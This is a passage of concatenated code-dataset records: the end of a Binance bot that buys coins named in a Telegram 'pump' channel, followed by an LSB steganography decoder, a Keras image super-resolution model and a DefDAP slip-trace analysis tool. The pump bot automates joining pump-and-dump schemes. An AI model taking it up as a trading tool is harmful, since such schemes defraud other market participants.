elif self.oco_order:\n try:\n order_status_oco = self.client.get_order(\n symbol=self.coin_symbol,\n orderId=self.oco_order[\"orders\"][1][\"orderId\"],\n )\n if order_status_oco[\"status\"] == \"FILLED\":\n self.tp_triggered = True\n elif order_status_oco[\"status\"] == \"EXPIRED\":\n self.sl_triggered = True\n except BinanceAPIException as e:\n print(colored(f\"Failed to get OCO Order - {e}\", \"red\"))\n if not self.tp_triggered and not self.sl_triggered:\n if self.tp_order_id:\n try:\n self.client.cancel_order(\n symbol=self.coin_symbol, orderId=self.tp_order_id\n )\n except BinanceAPIException as e:\n print(colored(f\"Failed to Cancel TP order - {e}\", \"red\"))\n if self.sl_order_id:\n try:\n self.client.cancel_order(\n symbol=self.coin_symbol, orderId=self.sl_order_id\n )\n except BinanceAPIException as e:\n print(colored(f\"Failed to Cancel SL order - {e}\", \"red\"))\n if self.oco_order:\n try:\n self.client.cancel_order(\n symbol=self.coin_symbol, orderId=self.oco_order[\"orders\"][1][\"orderId\"]\n )\n except BinanceAPIException as e:\n print(colored(f\"Failed to Cancel OCO order - {e}\", \"red\"))\n print(\n colored(\n \"None of Take Profit or Stop Loss were triggered, Selling ASAP !\",\n \"yellow\",\n )\n )\n\n market_sell_order = self.create_market_order_sell()\n if market_sell_order and market_sell_order[\"status\"] == \"FILLED\":\n print(colored(\"Market Sell Successful !\", \"green\"))\n if market_sell_order and market_sell_order[\"status\"] != \"FILLED\":\n print(\n colored(\n \"Market Sell Partially Successfull or Failed , Please check on Binance.com\",\n \"yellow\",\n )\n )\n else:\n if self.tp_triggered:\n print(\n colored(\n \"Congrats, Your Take Profit Order was triggered !\",\n \"green\",\n )\n )\n if self.sl_triggered:\n print(colored(\"Your Stop Loss Order was triggered !\", \"green\"))\n\n\n def initialise(self):\n if self.useTelegramCapture == \"true\":\n\n @self.telegram_client.on(events.NewMessage)\n async def my_event_handler(event):\n if event.chat_id == self.channel_id:\n self.coin_symbol = (extract(event.raw_text) + \"BTC\").upper()\n if re.match(\"^[A-Z0-9-_.]{1,20}$\", self.coin_symbol):\n print(\n f\"Coin to pump detected - {colored(self.coin_symbol,'green')}\"\n )\n self.coin_extract_status = True\n\n await self.telegram_client.disconnect()\n\n self.telegram_client.start()\n print(\"Listening For messages (press Ctrl+c to exit) !\")\n self.telegram_client.run_until_disconnected()\n if not self.coin_extract_status:\n print(colored(\"Failed to detect coin, enter manually !\", \"yellow\"))\n self.coin_symbol = (input() + \"BTC\").upper()\n if self.coin_symbol != \"\":\n self.start()\n else:\n print(\"Enter Coin name\")\n self.coin_symbol = input().upper() + \"BTC\"\n print(f\"Coin Entered - {colored(self.coin_symbol,'green')}\")\n self.start()\n\n\ndef main(data, isTrial):\n client = Bot(data, isTrial)\n client.initialise()\n","sub_path":"client/scripts/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":15846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"72453942","text":"import cv2 as cv\n\nheight = 0\nwidth = 0\n\ndef last(x):\n\t\"\"\"Return an integer value, the least significant bit of the argument.\"\"\"\n\tx = bin(x)\n\treturn x[len(x)-1]\n\ndef get_ascii(arr_list):\n\t\"\"\"Return a character, ascii equivalent of a number\"\"\"\n\tdeci = 0\n\tfor i in range(len(arr_list)):\n\t\tif arr_list[i] == '1':\n\t\t\tdeci = deci + pow(2,len(arr_list)-i)\n\n\treturn str(deci)\n\t\t\ndef getnext(list1,pos):\n\t\"\"\"Returns next character in message\"\"\"\n\tsum = 0\n\tk = 7\n\tfor i in range(pos,pos+8):\n\t\tif list1[i]=='1':\n\t\t\tsum = sum+pow(2,k)\n\t\tk = k-1\n\n\treturn chr(sum)\n\ndef get_message_size():\n\t\"\"\"Determines the size of message\"\"\"\n\tfile_obj = open(\"Res/user_input.txt\",\"r\")\n\tstring = file_obj.readline()\n\treturn len(string)\n\ndef write_To_File(message):\n\t\"\"\"Writes the decoded message to a file named Decoded.txt\"\"\"\n\tfile_obj = open(\"Res/decoded.txt\",\"w\")\n\tfile_obj.write(message)\n\n\ndef decode():\n\t\"\"\"main decoding logic\"\"\"\n\t\n\t''' Reading the steganographed Imgae file and calculating height and width of the image'''\n\tsteganoImage = cv.imread(\"Res/steganographed_image.png\",1)\n\theight,width = steganoImage.shape[:2]\n\n\t''' Initializes the message as null'''\n\tmessage = \"\"\n\n\t''' Initializes the starting conditions'''\n\tcolumn=0\n\trow=0\n\tcolor=0\n\n\t''' Last bits is an array that holds last bits of pixel values.'''\n\tlast_bits = []\n\n\tfor row in range(height):\n\t\tfor column in range(width):\n\t\t\tlast_bits.append(last(steganoImage[row][column][color]))\n\t\t\tif (column+1)%width == 0:\n\t\t\t\trow = row+1\n\t\t\t\tif row == height:\n\t\t\t\t\trow = 0\n\t\t\t\t\tcolor = color+1\n\t\t\tcolumn = (column+1)%width\n\n\tmessage_size = get_message_size()\n\n\ti=0\n\twhile True:\n\t\tnextChar = getnext(last_bits,i)\n\t\tif(nextChar == '`'):\n\t\t\ttemp = getnext(last_bits,i)\n\t\t\ti = i+8\n\t\t\ttemp2 = getnext(last_bits,i)\n\t\t\tif(temp == '`'):\n\t\t\t\tif(temp2 == '`'):\n\t\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tmessage+=temp\n\t\t\t\tmessage+=temp2\n\t\tmessage+=nextChar\n\t\ti = i+8\n\t\t\n\twrite_To_File(message)\n\ndef main():\n\tdecode()\n\t\nif __name__ == '__main__':\n\tmain()","sub_path":"LSB_Linear_Ret.py","file_name":"LSB_Linear_Ret.py","file_ext":"py","file_size_in_byte":1958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"322692822","text":"import logging\nimport os\nfrom abc import ABC, abstractmethod\nfrom typing import Dict, Tuple\n\nimport numpy as np\nfrom keras import Model\nfrom keras import backend as keras_backend\nfrom keras import layers\nfrom keras import losses\nfrom keras import optimizers\n\nfrom modules.generators import generators\nfrom modules.image import image, image_batch, image_utils\nfrom modules.model import denseblock, callbacks, model_utils\n\nDEFAULTS = {\n 'lr': 0.001,\n 'input_shape': [256, 256, 3],\n 'batch_size': 16,\n 'image_op': 'derez',\n 'training_directory': os.path.join('data', 'training'),\n 'validation_directory': os.path.join('data', 'validation'),\n 'evaluation_directory': os.path.join('data', 'evaluation'),\n 'steps': 1000,\n}\n\nMODULE_VERSION = '0'\n\nSUPPORTED_IMAGE_OPS_VERSION_TABLE = {\n 'blur': '0',\n 'derez': '1',\n 'blur_derez': '2',\n}\n\nLOG = logging.getLogger(__name__)\n\n\ndef psnr_loss(y_true, y_pred):\n \"\"\" PSNR is Peak Signal to Noise Ratio, defined below\n PSNR = 20 * log10(MAXp) - 10 * log10(MSE)\n MAXp = maximum pixel value.\n Our framework scales to [0,1] range, so MAXp = 1.\n The 20 * log10(MAXp) reduces to 0\n\n https://en.wikipedia.org/wiki/Peak_signal-to-noise_ratio\n \"\"\"\n\n return -10.0 * keras_backend.log(\n losses.mean_squared_error(y_true, y_pred)\n ) / keras_backend.log(10.0)\n\n\nclass SRModel(ABC):\n\n def __init__(self, config: Dict, model_version: str='0'):\n self._config = self._add_defaults(\n config=config,\n model_version=model_version\n )\n\n constructed_model = self._create_model(config=self._config)\n\n self._model = self._load_or_save_model_weights(\n model=constructed_model,\n config=self._config\n )\n\n model_utils.save_config(self._config)\n # only initialized before training\n self._image_generator = None\n\n def _add_defaults(self, config: Dict, model_version: str) -> Dict:\n \"\"\"Adds essential default values to a config dictionary via Default\n \"\"\"\n for key in DEFAULTS.keys():\n config[key] = config.get(key, DEFAULTS[key])\n\n config['name'] = config.get('name', self.__class__.__name__)\n\n image_op_version = SUPPORTED_IMAGE_OPS_VERSION_TABLE[config['image_op']]\n\n config['version'] = \\\n f'v{MODULE_VERSION}.{model_version}.{image_op_version}'\n\n # handles JSON not allowing tuples\n config['input_shape'] = tuple(config['input_shape'])\n\n # Handles the fpaths is any are missing\n path_keys = {\n 'model_fpath': 'model.hdf5',\n 'config_fpath': 'config.json',\n 'log_fpath': 'log.csv',\n }\n # Maps the file extensions for each key, so the path can be constructed easily\n for path_key in path_keys.keys():\n if config.get(path_key) is None:\n config[path_key] = os.path.join(\n self._save_name(config['version']),\n path_keys[path_key]\n )\n\n return config\n\n @property\n def version(self):\n return self._config['version']\n\n @staticmethod\n def _save_name(version: str) -> str:\n \"\"\"Name for saving and reading stored weights\n\n :param version: Version of model\n :return: An initialized directory path\n \"\"\"\n dir_path = os.path.join('configs', version)\n if not os.path.isdir(dir_path):\n os.mkdir(dir_path)\n return dir_path\n\n @staticmethod\n def _load_or_save_model_weights(model: Model, config: Dict) -> Model:\n \"\"\"Loads model weight if they exist, else saves them to model_fpath\n\n :param model: Constructed Model architecture\n :param config: configuration file\n :return: Model with loaded weight (if any)\n \"\"\"\n if os.path.isfile(config['model_fpath']):\n model.load_weights(config['model_fpath'])\n LOG.info(\n 'Loaded model weights from {}'.format(\n config['model_fpath'])\n )\n else:\n model.save_weights(config['model_fpath'])\n LOG.info(\n 'Initialized new model weights to {}'.format(\n config['model_fpath'])\n )\n return model\n\n @staticmethod\n def _initialize_image_generator_with_data(\n config: Dict) -> generators.SRImageGenerator:\n \"\"\"Initializes an SRImageGenerator from a configuration\n\n :param config: configuration dictionary\n :return: SRImageGenerator with data specified by configuration data paths\n \"\"\"\n return generators.SRImageGenerator(\n training_data=image_batch.PILImageBatch.open_from_list(\n image_utils.get_image_paths_from_dir(\n dir_path=config['training_directory'],\n image_file_extension='.png'\n )\n ),\n validation_data=image_batch.PILImageBatch.open_from_list(\n image_utils.get_image_paths_from_dir(\n dir_path=config['validation_directory'],\n image_file_extension='.png'\n )\n ),\n config=config\n )\n\n @abstractmethod\n def _create_model(self, config: Dict) -> Model:\n \"\"\"Creates the model\n\n :param config: Configuration file\n :return: ImageSR model\n \"\"\"\n pass\n\n def train(self, epochs: int):\n \"\"\"Trains the model for a given number of epochs.\n\n :param epochs: Number of epochs to train the model\n \"\"\"\n # initialize the image generator if not already initialized\n if self._image_generator is None:\n self._image_generator = \\\n self._initialize_image_generator_with_data(\n config=self._config\n )\n\n initial_epoch = self._config.get('epoch', 0)\n LOG.info(\n f'Training model for {epochs} epochs, starting at {initial_epoch}'\n )\n\n self._model.compile(\n optimizer=optimizers.Adam(\n lr=self._config['lr']\n ),\n loss='mse',\n metrics=[psnr_loss]\n )\n\n model_callbacks = callbacks.callback_list(self._config)\n steps = self._config['steps']\n\n self._model.fit_generator(\n self._image_generator.training_generator(),\n steps_per_epoch=steps,\n epochs=epochs+initial_epoch,\n verbose=LOG.getEffectiveLevel() <= logging.INFO,\n callbacks=model_callbacks,\n validation_data=self._image_generator.validation_generator(),\n validation_steps=steps // 10,\n initial_epoch=initial_epoch)\n\n def enhance(self,\n img: image.PILImage,\n output_size: Tuple[int, int]) -> image.PILImage:\n \"\"\"Performs the enhancement algorithm on a given image\n\n The basic algorithm is to increase the size of the image by a factor\n of at most 2 until it reaches the correct size\n\n :param img: Original PIL image\n :param output_size: desired output shape\n :return: Enhanced PILImage at the new output_size\n \"\"\"\n output_img = img\n while output_img.size != output_size:\n new_size: Tuple[int, int] = (\n min(2*output_img.size[0], output_size[0]),\n min(2*output_img.size[1], output_size[1]),\n )\n output_img_at_new_size = output_img.resize(size=new_size)\n\n # apply a blur if a blur was used in training\n if 'blur' in self._config['image_op']:\n output_img_at_new_size = output_img_at_new_size.blur()\n\n # numpyize the image for the model\n np_image = output_img_at_new_size.numpyize()\n\n # image needs to be a rank 4 input (1,) + image_shape\n model_input = np.expand_dims(np_image, axis=0)\n\n # use the model to predict the residual image\n residual_image = self._model.predict(model_input, batch_size=1)[0]\n\n # add the residual to the original\n enhanced_np_image = np_image + residual_image\n\n # clip the values to the expected [0, 1] range\n enhanced_np_image = enhanced_np_image.clip(min=0.0, max=1.0)\n\n # set back to PIL image\n output_img = image.PILImage.from_numpy_array(enhanced_np_image)\n\n return output_img\n","sub_path":"modules/model/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":8483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"429224458","text":"# Copyright 2020 Mechanics of Microstructures Group\n# at The University of Manchester\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport numpy as np\n\nfrom sklearn.cluster import MeanShift\nfrom scipy.stats import linregress\nimport pandas as pd\n\nfrom defdap.plotting import Plot, GrainPlot, LineSlice\n\n\nclass GrainInspector:\n \"\"\"\n Class containing the interactive grain inspector tool for slip trace analysis\n and relative displacement ratio analysis.\n\n \"\"\"\n def __init__(self, currMap, vmax=0.1):\n # Initialise some values\n self.grainID = 0\n self.currMap = currMap\n self.currEBSDMap = self.currMap.ebsdMap\n self.currDICGrain = self.currMap[self.grainID]\n self.currEBSDGrain = self.currDICGrain.ebsdGrain\n self.vmax = vmax\n \n # Draw the figure\n self.draw()\n\n def draw(self):\n \"\"\" Draw the main window, buttons, text boxes and axes.\n\n \"\"\"\n # Plot window\n self.plot = Plot(ax=None, makeInteractive=True, figsize=(14,8), title='Grain Inspector')\n \n # Buttons\n self.plot.addButton('Save\\nLine', self.saveLine, (0.73, 0.48, 0.05, 0.04))\n self.plot.addButton('Previous\\nGrain', lambda e, p: self.gotoGrain(self.grainID-1, p), (0.73, 0.94, 0.05, 0.04))\n self.plot.addButton('Next\\nGrain', lambda e, p: self.gotoGrain(self.grainID+1, p), (0.79, 0.94, 0.05, 0.04))\n self.plot.addButton('Run\\nAll STA', self.batchRunSTA, (0.81, 0.02, 0.1, 0.04))\n self.plot.addButton('Clear\\nAll Lines', self.clearAllLines, (0.89, 0.48, 0.05, 0.04))\n\n # Text boxes\n self.plot.addTextBox(label='Go to \\ngrain ID:', loc=(0.9, 0.94, 0.05, 0.04), submitHandler=self.gotoGrain)\n self.plot.addTextBox(label='Remove\\nID:', loc=(0.83, 0.48, 0.05, 0.04), submitHandler=self.removeLine)\n self.RDRGroupBox = self.plot.addTextBox(label='Run RDR\\non group:',\n loc=(0.78, 0.07, 0.05, 0.04), submitHandler=self.runRDRGroup)\n\n # Axes\n self.maxShearAx = self.plot.addAxes((0.05, 0.4, 0.65, 0.55))\n self.slipTraceAx = self.plot.addAxes((0.2, 0.05, 0.6, 0.3))\n self.unitCellAx = self.plot.addAxes((0.05, 0.055, 0.15, 0.3), proj='3d')\n self.grainInfoAx = self.plot.addAxes((0.73, 0.86, 0.25, 0.06))\n self.lineInfoAx = self.plot.addAxes((0.73, 0.55, 0.25, 0.3))\n self.groupsInfoAx = self.plot.addAxes((0.73, 0.15, 0.25, 0.3))\n self.grainPlot = self.currMap[self.grainID].plotMaxShear(fig=self.plot.fig, ax=self.maxShearAx, \n vmax=self.vmax, plotScaleBar=True, plotColourBar=True)\n self.plot.ax.axis('off')\n \n # Draw the stuff that will need to be redrawn often in a seperate function\n self.redraw()\n\n def gotoGrain(self, event, plot):\n \"\"\" Go to a specified grain ID.\n\n Parameters\n ----------\n event: int\n Grain ID to go to.\n\n \"\"\"\n ## Go to grain ID specified in event\n self.grainID=int(event)\n self.grainPlot.arrow=None\n self.currDICGrain = self.currMap[self.grainID]\n self.currEBSDGrain = self.currDICGrain.ebsdGrain\n self.redraw()\n\n def saveLine(self, event, plot):\n \"\"\" Save the start point, end point and angle of drawn line into the grain.\n\n Parameters\n ----------\n event: numpy.ndarray\n Start x, start y, end x, end y point of line passed from drawn line.\n\n \"\"\"\n # Get angle of lines\n lineAngle = 90-np.rad2deg(np.arctan2(self.drawnLine.points[3]-self.drawnLine.points[1], \n self.drawnLine.points[2]-self.drawnLine.points[0]))\n if lineAngle > 180: lineAngle -= 180\n elif lineAngle < 0: lineAngle += 180\n #lineAngle += self.currMap.ebsdTransform.rotation*-180/np.pi\n \n # Save drawn line to the DIC grain\n self.currDICGrain.pointsList.append([self.drawnLine.points, lineAngle, -1])\n \n # Group lines and redraw\n self.groupLines()\n self.redraw()\n \n def groupLines(self):\n \"\"\"\n Group the lines drawn in the current grain item using a mean shift algorithm,\n save the average angle and detect the active slip planes.\n\n \"\"\"\n angles = [x[1] for x in self.currDICGrain.pointsList]\n # For single line, don't group\n if len(angles) == 1:\n self.currDICGrain.pointsList[0][2]=0\n self.currDICGrain.groupsList = [[0, angles[0], 0, 0, 0]]\n else:\n # Run clustering algorithm for >1 line\n ms = MeanShift(bandwidth=10).fit(np.matrix([range(len(angles)), angles]).transpose())\n \n # Add group ID for each line to the points list\n for i, label in enumerate(ms.labels_):\n self.currDICGrain.pointsList[i][2] = label\n \n # Make array of groups with mean angle\n self.currDICGrain.groupsList = []\n for i in range(np.max(ms.labels_+1)):\n self.currDICGrain.groupsList.append([i, ms.cluster_centers_[i][1], 0, 0, 0])\n \n # Detect active slip systems in each group\n for group in self.currDICGrain.groupsList:\n activePlanes = []\n deviation = []\n experimentalAngle = group[1]\n for idx, theoreticalAngle in enumerate(np.rad2deg(self.currEBSDGrain.slipTraceAngles)):\n if theoreticalAngle-5 < experimentalAngle < theoreticalAngle+5:\n activePlanes.append(idx)\n deviation.append(experimentalAngle-theoreticalAngle)\n group[2] = activePlanes\n group[3] = deviation\n \n def clearAllLines(self, event, plot):\n \"\"\" Clear all lines in a given grain.\n\n \"\"\"\n\n self.currDICGrain.pointsList = []\n self.currDICGrain.groupsList = []\n self.redraw()\n\n def removeLine(self, event, plot):\n \"\"\" Remove single line [runs after submitting a text box].\n\n Parameters\n ----------\n event: int\n Line ID to remove.\n\n \"\"\"\n ## Remove single line\n del self.currDICGrain.pointsList[int(event)]\n self.redraw()\n\n def redraw(self):\n \"\"\"\n Draw items which need to be redrawn often (i.e. when changing grain ID).\n\n \"\"\"\n\n # Plot max shear for grain\n self.maxShearAx.clear()\n grainPlot = self.currMap[self.grainID].plotMaxShear(\n fig=self.plot.fig,ax=self.maxShearAx, vmax=self.vmax, plotColourBar=False, plotScaleBar=True)\n\n # Draw slip traces\n self.slipTraceAx.clear()\n self.slipTraceAx.set_aspect('equal', 'box')\n slipPlot = GrainPlot(fig=self.plot.fig, callingGrain=self.currMap[self.grainID], ax=self.slipTraceAx)\n traces = slipPlot.addSlipTraces(topOnly=True)\n self.slipTraceAx.axis('off')\n \n # Draw slip bands\n bands = [elem[1] for elem in self.currDICGrain.groupsList]\n if self.currDICGrain.groupsList != None:\n slipPlot.addSlipBands(topOnly=True, angles=list(np.deg2rad(bands)))\n \n # Draw unit cell\n self.unitCellAx.clear()\n self.currEBSDGrain.plotUnitCell(fig=self.plot.fig, ax=self.unitCellAx)\n \n # Write grain info text\n self.grainInfoAx.clear()\n self.grainInfoAx.axis('off')\n grainInfoText = 'Grain ID: {0} / {1}\\n'.format(self.grainID, len(self.currMap.grainList))\n grainInfoText += 'Min: {0:.1f} % Mean:{1:.1f} % Max: {2:.1f} %'.format(\n np.min(self.currDICGrain.maxShearList)*100,\n np.mean(self.currDICGrain.maxShearList)*100,\n np.max(self.currDICGrain.maxShearList)*100)\n self.plot.addText(self.grainInfoAx, 0, 1, grainInfoText, va='top', ha='left', fontsize=10)\n \n # Detect lines\n self.drawnLine = LineSlice(ax=self.maxShearAx, fig=self.plot.fig, action=self.grainPlot.addArrow)\n\n # Write lines text and draw lines\n linesTxt = 'List of lines\\n\\nLineID x0 y0 x1 y1 Angle Group\\n'\n\n if self.currDICGrain.pointsList != []:\n for idx, points in enumerate(self.currDICGrain.pointsList):\n linesTxt += '{0} {1:.1f} {2:.1f} {3:.1f} {4:.1f} {5:.1f} {6}\\n'.format(idx,\n points[0][0], points[0][1], points[0][2], points[0][3], points[1], points[2])\n self.grainPlot.addArrow(startEnd=points[0], clearPrev=False, persistent=True, label=idx)\n \n self.lineInfoAx.clear()\n self.lineInfoAx.axis('off')\n self.plot.addText(self.lineInfoAx, 0, 1, linesTxt, va='top', fontsize=10)\n \n # Write groups info text\n groupsTxt = 'List of groups\\n\\nGroupID Angle System Dev RDR\\n'\n if self.currDICGrain.groupsList != []:\n for idx, group in enumerate(self.currDICGrain.groupsList):\n groupsTxt += '{0} {1:.1f} {2} {3} {4:.2f}\\n'.format(\n idx, group[1], group[2], np.round(group[3],3), group[4])\n\n self.groupsInfoAx.clear()\n self.groupsInfoAx.axis('off')\n self.plot.addText(self.groupsInfoAx, 0, 1, groupsTxt, va='top', fontsize=10)\n\n def runRDRGroup(self, event, plot):\n \"\"\" Run RDR on a specified group, upon submitting a text box.\n\n Parameters\n ----------\n event: int\n Group ID specified from text box.\n\n \"\"\"\n ## Run RDR for group of lines\n if event != '':\n self.calcRDR(grain = self.currDICGrain, group=int(event))\n self.RDRGroupBox.set_val('')\n \n def batchRunSTA(self, event, plot):\n \"\"\" Run slip trace analysis on all grains which hve slip trace lines drawn.\n\n \"\"\"\n\n # Print header\n print(\"Grain\\tEul1\\tEul2\\tEul3\\tMaxSF\\tGroup\\tAngle\\tSystem\\tDev\\RDR\")\n \n # Print information for each grain\n for idx, grain in enumerate(self.currMap):\n if grain.pointsList != []:\n for group in grain.groupsList:\n maxSF = np.max([item for sublist in grain.ebsdGrain.averageSchmidFactors for item in sublist])\n eulers = self.currEBSDGrain.refOri.eulerAngles()*180/np.pi\n text = '{0}\\t{1:.1f}\\t{2:.1f}\\t{3:.1f}\\t{4:.3f}\\t'.format(\n idx, eulers[0], eulers[1], eulers[2], maxSF)\n text += '{0}\\t{1:.1f}\\t{2}\\t{3}\\t{4:.2f}'.format(\n group[0], group[1], group[2], np.round(group[3],3), group[4])\n print(text)\n\n def calcRDR(self, grain, group, showPlot=True, length=2.5):\n \"\"\" Calculates the relative displacement ratio for a given grain and group.\n\n Parameters\n ----------\n grain: int\n DIC grain ID to run RDR on.\n group: int\n group ID to run RDR on.\n showPlot: bool\n if True, show plot window.\n length: int\n length of perpendicular lines used for RDR.\n\n \"\"\"\n \n ulist=[]; vlist=[]; allxlist = []; allylist = []; \n\n # Get all lines belonging to group\n points = []\n for point in grain.pointsList:\n if point[2] == group:\n points.append(point[0])\n\n for point in points:\n x0=point[0]; y0=point[1]; x1=point[2]; y1=point[3];\n grad = (y1-y0)/(x1-x0)\n invgrad = -1/grad\n profile_length = np.sqrt((y1-y0)**2+(x1-x0)**2)\n num = np.round(profile_length*2)\n \n ### Calculate positions for each point along slip trace line (x,y)\n x, y = np.round(np.linspace(x0, x1, int(num))), np.round(np.linspace(y0, y1, int(num)))\n df = pd.DataFrame({'x':x, 'y':y}).drop_duplicates()\n x,y = df['x'].values.tolist(),df['y'].values.tolist()\n\n ## Calculate deviation from (0,0) for points along line with angle perpendicular to slip line (xnew,ynew)\n x0new = np.sqrt(length/(invgrad**2+1))*np.sign(grad)\n y0new = -np.sqrt(length/(1/invgrad**2+1))\n x1new = -np.sqrt(length/(invgrad**2+1))*np.sign(grad)\n y1new = np.sqrt(length/(1/invgrad**2+1))\n profile_length=np.sqrt((y1new-y0new)**2+(x1new-x0new)**2)\n num = np.round(profile_length)\n xnew, ynew = np.linspace(x0new, x1new, int(num)), np.linspace(y0new, y1new, int(num))\n xnew, ynew = np.around(xnew).astype(int), np.around(ynew).astype(int)\n df = pd.DataFrame({'x':xnew, 'y':ynew}).drop_duplicates()\n xnew,ynew = df['x'].values.tolist(), df['y'].values.tolist()\n \n for x,y in zip(x,y):\n xperp = []; yperp = [];\n for xdiff, ydiff in zip(xnew, ynew):\n xperp.append(int(x+xdiff))\n yperp.append(int(y+ydiff))\n allxlist.append(xperp)\n allylist.append(yperp)\n\n xmap = self.currDICGrain.extremeCoords[0] + xperp\n ymap = self.currDICGrain.extremeCoords[1] + yperp\n \n ### For all points, append u and v to list\n u = []; v = [];\n for xmap, ymap in zip(xmap,ymap):\n u.append((self.currMap.crop(self.currMap.x_map))[ymap, xmap])\n v.append((self.currMap.crop(self.currMap.y_map))[ymap, xmap])\n\n ### Take away mean\n u = u-np.mean(u); v = v-np.mean(v)\n\n ### Append to main lists (ulist,vlist)\n ulist.extend(u)\n vlist.extend(v)\n\n ### Linear regression of ucentered against vcentered\n linRegResults = linregress(x=vlist,y=ulist)\n \n # Save measured RDR\n grain.groupsList[group][4] = linRegResults.slope\n \n\n if showPlot: self.plotRDR(grain, group, ulist, vlist, allxlist, allylist, linRegResults)\n\n def plotRDR(self, grain, group, ulist, vlist, allxlist, allylist, linRegResults):\n \"\"\"\n Plot RDR figure, including location of perpendicular lines and scatter plot of ucentered vs vcentered.\n \n Parameters\n ----------\n grain: int\n DIC grain to plot.\n group: int\n Group ID to plot.\n ulist: list\n List of ucentered values.\n vlist: list\n List of vcentered values.\n allxlist: list\n List of all x values.\n allylist: list\n List of all y values.\n linRegResults: numpy.ndarray, {slope, intercept, rvalue, pvalue, stderr}\n Results from linear regression of ucentered vs vcentered.\n\n \"\"\"\n\n # Draw window and axes\n self.rdrPlot = Plot(ax=None, makeInteractive=True, title='RDR Calculation', figsize=(21, 7))\n self.rdrPlot.ax.axis('off')\n self.rdrPlot.grainAx = self.rdrPlot.addAxes((0.05, 0.07, 0.20, 0.85))\n self.rdrPlot.textAx = self.rdrPlot.addAxes((0.27, 0.07, 0.20, 0.85))\n self.rdrPlot.textAx.axis('off')\n self.rdrPlot.numLineAx = self.rdrPlot.addAxes((0.48, 0.07, 0.2, 0.85))\n self.rdrPlot.numLineAx.axis('off')\n self.rdrPlot.plotAx = self.rdrPlot.addAxes((0.75, 0.07, 0.2, 0.85))\n\n ## Draw grain plot\n self.rdrPlot.grainPlot = self.currDICGrain.plotMaxShear(fig=self.rdrPlot.fig, ax=self.rdrPlot.grainAx, \n plotColourBar=False, plotScaleBar = True) \n self.rdrPlot.grainPlot.addColourBar(label='Effective Shear Strain', fraction=0.046, pad=0.04)\n\n ## Draw all points\n self.rdrPlot.grainAx.plot(allxlist, allylist, 'rx',lw=0.5)\n for xlist, ylist in zip(allxlist, allylist):\n self.rdrPlot.grainAx.plot(xlist, ylist, '-',lw=1)\n\n ## Generate scatter plot\n slope = linRegResults.slope\n r_value = linRegResults.rvalue\n intercept = linRegResults.intercept\n std_err = linRegResults.stderr\n \n self.rdrPlot.plotAx.scatter(x=vlist,y=ulist,marker='x', lw=1)\n self.rdrPlot.plotAx.plot(\n [np.min(vlist), np.max(vlist)],[slope*np.min(vlist)+intercept,slope*np.max(vlist)+intercept], '-')\n self.rdrPlot.plotAx.set_xlabel('v-centered')\n self.rdrPlot.plotAx.set_ylabel('u-centered')\n self.rdrPlot.addText(self.rdrPlot.plotAx, 0.95, 0.01, 'Slope = {0:.3f} ± {1:.3f}\\nR-squared = {2:.3f}\\nn={3}'\n .format(slope,std_err,r_value**2,len(ulist)), va='bottom', ha='right',\n transform=self.rdrPlot.plotAx.transAxes, fontsize=10);\n\n ## Write grain info\n ebsdGrain = grain.ebsdGrain\n ebsdGrain.calcSlipTraces()\n\n if ebsdGrain.averageSchmidFactors is None:\n raise Exception(\"Run 'calcAverageGrainSchmidFactors' first\")\n\n eulers = np.rad2deg(ebsdGrain.refOri.eulerAngles())\n\n text = 'Average angle: {0:.2f}\\n'.format(grain.groupsList[group][1])\n text += 'Eulers: {0:.1f} {1:.1f} {2:.1f}\\n\\n'.format(eulers[0], eulers[1], eulers[2])\n\n self.rdrPlot.addText(self.rdrPlot.textAx, 0.15, 1, text, fontsize=10, va='top')\n\n ## Write slip system info\n RDRs = []; offset = 0; \n for idx, (ssGroup, sfGroup, slipTraceAngle) in enumerate(\n zip(grain.ebsdMap.slipSystems, ebsdGrain.averageSchmidFactors, np.rad2deg(ebsdGrain.slipTraceAngles))):\n text = \"{0:s} {1:.1f}\\n\".format(ssGroup[0].slipPlaneLabel, slipTraceAngle)\n tempRDRs = [];\n for ss, sf in zip(ssGroup, sfGroup):\n slipDirSample = ebsdGrain.refOri.conjugate.transformVector(ss.slipDir)\n text = text + \" {0:s} SF: {1:.3f} RDR: {2:.3f}\\n\".format\\\n (ss.slipDirLabel, sf,-slipDirSample[0]/slipDirSample[1])\n RDR = -slipDirSample[0]/slipDirSample[1]\n tempRDRs.append(RDR)\n RDRs.append(tempRDRs) \n\n if idx in grain.groupsList[group][2]:\n self.rdrPlot.addText(self.rdrPlot.textAx, 0.15, 0.9-offset, text, weight='bold', fontsize=10, va='top')\n else:\n self.rdrPlot.addText(self.rdrPlot.textAx, 0.15, 0.9-offset, text, fontsize=10, va='top')\n\n offset += 0.0275 * text.count('\\n')\n\n # Plot RDR values on number line\n uniqueRDRs = set()\n for x in [item for sublist in RDRs for item in sublist]: uniqueRDRs.add(x)\n self.rdrPlot.numLineAx.axvline(x=0, ymin=-20, ymax=20, c='k')\n self.rdrPlot.numLineAx.plot(np.zeros(len(uniqueRDRs)), list(uniqueRDRs), 'bo', label='Theroretical RDR values')\n self.rdrPlot.numLineAx.plot([0], slope, 'ro', label='Measured RDR value')\n self.rdrPlot.addText(self.rdrPlot.numLineAx, -0.009, slope-0.01, '{0:.3f}'.format(float(slope)))\n self.rdrPlot.numLineAx.legend(bbox_to_anchor=(1.15, 1.05))\n \n # Label RDRs by slip system on number line \n for RDR in list(uniqueRDRs):\n self.rdrPlot.addText(self.rdrPlot.numLineAx, -0.009, RDR-0.01, '{0:.3f}'.format(float(RDR)))\n txt = ''\n for idx, ssGroup in enumerate(RDRs):\n for idx2, rdr in enumerate(ssGroup):\n if rdr == RDR:\n txt += str('{0} {1} 